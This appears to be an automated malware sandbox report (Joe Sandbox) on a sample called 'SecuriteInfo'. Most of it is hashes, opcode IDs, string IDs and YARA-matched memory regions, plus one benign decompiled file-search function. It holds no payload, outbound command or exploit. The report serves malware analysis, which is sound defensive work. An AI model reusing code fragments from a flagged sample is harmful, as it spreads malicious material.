                                                                                                                          • Opcode Fuzzy Hash: b8cfa05f27f7292453aaf3bc4284cdf8c35f91219afb44ad038f9ea9f7fe4940
                                                                                                                          • Instruction Fuzzy Hash: E0710175A087999BDB30DE3989647DF37B2BFA9350F85442EDC8DAB200C3309A429B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: d12ccb5bb885a5d9de5092ad50925577fd7879b810b8e7edc0c8924d76ae12fe
                                                                                                                          • Instruction ID: c20c8beaad163bfdc0fd780f304d5a79b8ebf908e933f11e6e4defe847b61178
                                                                                                                          • Opcode Fuzzy Hash: d12ccb5bb885a5d9de5092ad50925577fd7879b810b8e7edc0c8924d76ae12fe
                                                                                                                          • Instruction Fuzzy Hash: F6710275A087899BDB30DE398D547DF37B6AFA9350F85442EDC8D9B200C3309A468B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: ebfe82610fab9390764de6fbc3ce212e267b8caf17c5d239c8c4fd010a0fde69
                                                                                                                          • Instruction ID: 9ecde4aad93a80c83807d25f1ea356ee0c0b82113766d0ea2ab9bcdc84e522f2
                                                                                                                          • Opcode Fuzzy Hash: ebfe82610fab9390764de6fbc3ce212e267b8caf17c5d239c8c4fd010a0fde69
                                                                                                                          • Instruction Fuzzy Hash: CD7101756087999BDB30DE398D647DF37B2BFA9350F85442EDC8DAB200D3309A428B55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 51cd8db77146597eab8c0c7032779502b5267311946d1fd35c5c51fa7b8a3b6e
                                                                                                                          • Instruction ID: 7e6f1028e672f8b831353a3cc80508262ae8f6c58b25e9bb06f4c7530465c2bf
                                                                                                                          • Opcode Fuzzy Hash: 51cd8db77146597eab8c0c7032779502b5267311946d1fd35c5c51fa7b8a3b6e
                                                                                                                          • Instruction Fuzzy Hash: 4E514675A0475A9FDB309E38CD547DF33B2BFA9750F85442EDC89AB201D3308A428B85
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 1c56757cdeb5892ff625e364b16f22253b8d8fa3a7b5da3cfe19e2f5e58c6236
                                                                                                                          • Instruction ID: 42c9f387f51a3fe9979e53193bfa4c3321d9dbf9e3db53b15a9cafa1fa3de6af
                                                                                                                          • Opcode Fuzzy Hash: 1c56757cdeb5892ff625e364b16f22253b8d8fa3a7b5da3cfe19e2f5e58c6236
                                                                                                                          • Instruction Fuzzy Hash: 84513775A047599FDB309E38CD547DF37B2BFA9750F85442EDC89AB200C3308A468B85
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 269f9974c51a1a3eaae6cba9c67f48a97f964892cfe38e27c1ce15489d968340
                                                                                                                          • Instruction ID: f739a795088a05eb585656e936460ea4836cd38a926d7a7e5f565d64f6d426c9
                                                                                                                          • Opcode Fuzzy Hash: 269f9974c51a1a3eaae6cba9c67f48a97f964892cfe38e27c1ce15489d968340
                                                                                                                          • Instruction Fuzzy Hash: F8515875A0479A9FDB309E78CD547DF37B2BFA9350F85442EDC89AB201D3308A468B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: fa9717723e8f51c58c265147e01df0a04851c4bc6f362587f65e5bd520f72c36
                                                                                                                          • Instruction ID: fc50bb2bf5f57b71c68e3fad8fbc36940d929f6924bf0c664b1a6145a4a6d637
                                                                                                                          • Opcode Fuzzy Hash: fa9717723e8f51c58c265147e01df0a04851c4bc6f362587f65e5bd520f72c36
                                                                                                                          • Instruction Fuzzy Hash: D8514776A0479A9FDB309E38CD647DF37B2BFA9350F85442EDC899B200D3309A468B55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 772196b8b916e11ba802b46e697e48659350dc98004fc96d2f89a4745e19bd38
                                                                                                                          • Instruction ID: 7c4148220542f1b40f0f934b92bf89cefdc4c6a8b2ba476834c0a84c183885ec
                                                                                                                          • Opcode Fuzzy Hash: 772196b8b916e11ba802b46e697e48659350dc98004fc96d2f89a4745e19bd38
                                                                                                                          • Instruction Fuzzy Hash: 54513775A047999FDB309E388D547DF37B2BF69750F85042EDC89AB201D3704A428B95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 46d9e2f1aa0f33b84822ae37488303a3c6e84e9a0321f40ffcda2bb4e2f1fc0f
                                                                                                                          • Instruction ID: 975f0b4da65d60c7bfa5d274489ef9031bff1b890acc39b01b91aad69315bd36
                                                                                                                          • Opcode Fuzzy Hash: 46d9e2f1aa0f33b84822ae37488303a3c6e84e9a0321f40ffcda2bb4e2f1fc0f
                                                                                                                          • Instruction Fuzzy Hash: 71515876A0479A9FDB309E38CD647DF37B2BF69350F85042EDC899B200D3308A428B55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: a0047d8a696d42d403553ed138f9957c176ca37d41b5ac1e127644669798a741
                                                                                                                          • Instruction ID: c1db0346ee985a9b41657ff32f15a827bce19d452a37f4408988a6837de55899
                                                                                                                          • Opcode Fuzzy Hash: a0047d8a696d42d403553ed138f9957c176ca37d41b5ac1e127644669798a741
                                                                                                                          • Instruction Fuzzy Hash: C45124356087969BCB30DE39C9657DF37B2BF69750F85042FDC89AB201C3708A429B86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: ddc14276e4d58720e65ca43b66c3b0973d0f509e2c4c92d7a7c43efd88a11424
                                                                                                                          • Instruction ID: 575504f291f8338ac988cac0f0bb0defb06d70712223c64199646dfab2c9a49b
                                                                                                                          • Opcode Fuzzy Hash: ddc14276e4d58720e65ca43b66c3b0973d0f509e2c4c92d7a7c43efd88a11424
                                                                                                                          • Instruction Fuzzy Hash: 225111356087969BCB309E39C9657DF37B2BF69350F86042FDC8D9B201D3708A468B86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 2cd60fe5f1c8d32a2e179be36b2881066575de19222b17ee899ef0a9d97a42a7
                                                                                                                          • Instruction ID: 97a0a438759b9da3be0ca3e3204884aa3508061cb00ac058ec24a623ac06c86a
                                                                                                                          • Opcode Fuzzy Hash: 2cd60fe5f1c8d32a2e179be36b2881066575de19222b17ee899ef0a9d97a42a7
                                                                                                                          • Instruction Fuzzy Hash: 3C5101356087969BCB30DE3989657DB77B2AF69750F85042FDC88AB201C3708A429B86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 3b564747bd743c61c71ab6bd4e703bcc22f43647c1f90105c9f0b726d369a420
                                                                                                                          • Instruction ID: 6be9144d84efa8cef37f982cd148f0b29d61cf38a64195935ec43bb205c1bd72
                                                                                                                          • Opcode Fuzzy Hash: 3b564747bd743c61c71ab6bd4e703bcc22f43647c1f90105c9f0b726d369a420
                                                                                                                          • Instruction Fuzzy Hash: 965121356087969FCB30DE39C9657DB37B2AF69350F85042EDC889B201C3308A428B86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 83946d385510e3e3001e6f32f28e82a6fb43db785c1ec4e1d57d0f9148ca1bd4
                                                                                                                          • Instruction ID: 9a384524c11fbf3950fe9ef0d42b21686bf2c2f1eba0a260a8aebe8cd1e2b874
                                                                                                                          • Opcode Fuzzy Hash: 83946d385510e3e3001e6f32f28e82a6fb43db785c1ec4e1d57d0f9148ca1bd4
                                                                                                                          • Instruction Fuzzy Hash: 4B4122356087969BCB309E39CD657DB37B2BF69350F86042EDC8C9B201C3708A468B86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 7be318d72a75cd05b5d1babb7b364986263ba0ad0ca8a3f6369a5274a589d83c
                                                                                                                          • Instruction ID: 4aa4345c6bf652632737e58f4168d6ef03fefb5cefffd1538f7486dc26f56fd8
                                                                                                                          • Opcode Fuzzy Hash: 7be318d72a75cd05b5d1babb7b364986263ba0ad0ca8a3f6369a5274a589d83c
                                                                                                                          • Instruction Fuzzy Hash: E741223550839A9FCB309E39CD657DB37B2AF69350F85042EDC8C9B201C3308A428B86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: @$x810
                                                                                                                          • API String ID: 0-1110744327
                                                                                                                          • Opcode ID: 3c7f31de1440269e6f81ba3cdfb10d568319891125b67fefa9eac78431c455aa
                                                                                                                          • Instruction ID: 57cc2ed0f7619bfd631a85dbcc7ee33e14a45989203678b2b27f3d2921eb57ec
                                                                                                                          • Opcode Fuzzy Hash: 3c7f31de1440269e6f81ba3cdfb10d568319891125b67fefa9eac78431c455aa
                                                                                                                          • Instruction Fuzzy Hash: 8821AF64D08306CAFF39F9740BA23F63E66AF57255F9001D7CC6B5E122C3150987490E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 761900d3c2dc8021ab91f05905929112ee9c525170f9e27c85a74fb967f3512a
                                                                                                                          • Instruction ID: 7c01d91107b6e46d41cd5c63370b8ba56cb70c8d641f298faa377927d3af3944
                                                                                                                          • Opcode Fuzzy Hash: 761900d3c2dc8021ab91f05905929112ee9c525170f9e27c85a74fb967f3512a
                                                                                                                          • Instruction Fuzzy Hash: 5A318B35604356DBCB30DE39C8847CB36F6BF68350F86042BDDC8AB105D3704A429786
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 6b56ffbc5b67acc73a7d25d3b0ec61b2feffde6a2777b585931c90c84628fba2
                                                                                                                          • Instruction ID: 6d54e3087d50cc3494469efc79de9bdfb6b6e704e3b97d10eaf89bc753819fe2
                                                                                                                          • Opcode Fuzzy Hash: 6b56ffbc5b67acc73a7d25d3b0ec61b2feffde6a2777b585931c90c84628fba2
                                                                                                                          • Instruction Fuzzy Hash: AC31667A608756DBCB20EE3988847CB76F2BF68350F86442BDDC8AB105D3704A429786
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 980f6d9d56deab4e38c2b427263de32c5a3463e1ff89b791ad27c62b765cde55
                                                                                                                          • Instruction ID: d8282af22528716dced3c00c7cd8eb9994f9af519a4f2904170875ed8e76b5e1
                                                                                                                          • Opcode Fuzzy Hash: 980f6d9d56deab4e38c2b427263de32c5a3463e1ff89b791ad27c62b765cde55
                                                                                                                          • Instruction Fuzzy Hash: 7A31577A608756DBCB20EE3D88847CB76F2BF79350F86042BDCC8AB505C3704A429786
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 240accbbd83d4c30694c5310d905f210a2c6502f8ad47e523863ad210732737e
                                                                                                                          • Instruction ID: 5138060b327c84c76fab88bcacc82f0025547c2f303751a64523af9a5879b06c
                                                                                                                          • Opcode Fuzzy Hash: 240accbbd83d4c30694c5310d905f210a2c6502f8ad47e523863ad210732737e
                                                                                                                          • Instruction Fuzzy Hash: A931693A608396DBCB20DE3D88447CB76F6BF68350F86042BDDC89B605C3704A42D786
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 0H~$U!'L
                                                                                                                          • API String ID: 0-14782489
                                                                                                                          • Opcode ID: 454b1f653238de5c485ef572bef1462024ce274b2a1df466af24eba6718e536f
                                                                                                                          • Instruction ID: 0867e85e68d0adf76f723a3c87fe3facb1d04f92fefbbc868b60b12a9903ebbc
                                                                                                                          • Opcode Fuzzy Hash: 454b1f653238de5c485ef572bef1462024ce274b2a1df466af24eba6718e536f
                                                                                                                          • Instruction Fuzzy Hash: 8231587A6043569BCB20AE3989947CB36F2BF68350F86441ADDC89B105D3705A429686
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 39%
                                                                                                                          			E0040290B(short __ebx, short* __edi) {
                                                                                                                          				void* _t21;
                                                                                                                          
                                                                                                                          				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                                                                                          					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                                                          					_push(_t21 - 0x2b0);
                                                                                                                          					_push(__edi);
                                                                                                                          					E00406668();
                                                                                                                          				} else {
                                                                                                                          					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                                                          					 *__edi = __ebx;
                                                                                                                          					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                                                          				}
                                                                                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                                                                          				return 0;
                                                                                                                          			}




                                                                                                                          0x00402923
                                                                                                                          0x0040293e
                                                                                                                          0x00402949
                                                                                                                          0x0040294a
                                                                                                                          0x00402a94
                                                                                                                          0x00402925
                                                                                                                          0x00402928
                                                                                                                          0x0040292b
                                                                                                                          0x0040292e
                                                                                                                          0x0040292e
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1974802433-0
                                                                                                                          • Opcode ID: 3812873045283f285f1247532dd54c3fa51c8ba8dc548d2d89519b4a03c2eda2
                                                                                                                          • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                                                          • Opcode Fuzzy Hash: 3812873045283f285f1247532dd54c3fa51c8ba8dc548d2d89519b4a03c2eda2
                                                                                                                          • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: i
                                                                                                                          • API String ID: 0-3865851505
                                                                                                                          • Opcode ID: ec88cd133548ade395559a476ea9acfcdb611af67aed05a6f00beb899429bd19
                                                                                                                          • Instruction ID: 32ba53de5a6f71c5ed16173f3afd781f0e68131613554f567a2626c23ea7957e
                                                                                                                          • Opcode Fuzzy Hash: ec88cd133548ade395559a476ea9acfcdb611af67aed05a6f00beb899429bd19
                                                                                                                          • Instruction Fuzzy Hash: AA91F471A04789DFCB34DE28C8A47EB73E1BF6A340F85412ACC999FA45D3305A81CB46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: iX`
                                                                                                                          • API String ID: 0-3399295701
                                                                                                                          • Opcode ID: 1ecd52c868aa2848943c85e7f589234afe62b4d067a8961b0b064c85be241faf
                                                                                                                          • Instruction ID: d6d62463e8b18a501f7c24eba3debef230ca34d99c54fe92c3c2610837bd15c8
                                                                                                                          • Opcode Fuzzy Hash: 1ecd52c868aa2848943c85e7f589234afe62b4d067a8961b0b064c85be241faf
                                                                                                                          • Instruction Fuzzy Hash: 8D812775A047498FDF34DE68CD583DA37A2EFA9350F89411ACC899F209D3314A82CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: iX`
                                                                                                                          • API String ID: 0-3399295701
                                                                                                                          • Opcode ID: ab47972e48950da61b6a0a3a0b7c33d5c4624ac9b837bf3540ea03dc386f2a30
                                                                                                                          • Instruction ID: 1766556b1d815a8a2f8f15a7ac85bcab4584a134804300ea34e5ef19901ffbd1
                                                                                                                          • Opcode Fuzzy Hash: ab47972e48950da61b6a0a3a0b7c33d5c4624ac9b837bf3540ea03dc386f2a30
                                                                                                                          • Instruction Fuzzy Hash: 0C812675A0478A8FDF34DE6CCD583DA37A2AFA9350F89411BCC899F209D3314A82CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: iX`
                                                                                                                          • API String ID: 0-3399295701
                                                                                                                          • Opcode ID: beaec959238d611f2ec8a86a8348c23db67c676d0722af3ba09a7d1a4313150a
                                                                                                                          • Instruction ID: 44a7240d752ec044713b315e06dfe8ff27efbf813909dc5745ab719fcf79e0c1
                                                                                                                          • Opcode Fuzzy Hash: beaec959238d611f2ec8a86a8348c23db67c676d0722af3ba09a7d1a4313150a
                                                                                                                          • Instruction Fuzzy Hash: 29812675A0478A8FDF34DE68CD583DA3762AFA9350F99411BCC899F209D3314A82CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
